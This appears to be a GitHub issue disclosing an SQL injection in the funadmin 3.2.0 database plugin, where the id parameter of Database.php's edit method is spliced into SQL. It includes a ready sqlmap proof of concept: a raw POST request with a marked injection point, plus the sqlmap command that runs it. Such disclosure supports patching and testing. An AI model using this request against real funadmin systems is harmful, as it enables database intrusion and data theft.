You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Code Audit Process
Vulnerability occurs in
app\databases\controller\Database.php#edit method
Get the id directly and splice it into the sql statement
Vulnerability recurrence
Conditions: background administrator rights
sqlmap poc save as txt
Vulnerability Product:funadmin
![image](https://user-images.githubusercontent.com/122217858/215309458-00d0c9dc-de41-48ab-9ba2-b146bb6877ea.png)
Vulnerability version:.3.2.0
Vulnerability type:sql injection
Vulnerability Details:
Vulnerability occurs in plugin - database management plugin
Code Audit Process
![image](https://user-images.githubusercontent.com/122217858/215309476-aeff1b23-62a3-42c5-8291-a5e2c0e00e86.png)
Vulnerability occurs in
app\databases\controller\Database.php#edit method
Get the id directly and splice it into the sql statement
Vulnerability recurrence
Conditions: background administrator rights
sqlmap poc save as txt
`POST /databases/database/edit?id=fun_addon* HTTP/1.1
Host: 192.168.3.129:8092
Content-Length: 187
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:8092
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420;
Connection: close
TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&token=d659d1ffb4e68ff1910c1c7c75a43539`
![image](https://user-images.githubusercontent.com/122217858/215309539-1a710a2b-67a6-4667-a770-33adfccc4137.png)
python sqlmap.py -r poc.txt
The text was updated successfully, but these errors were encountered: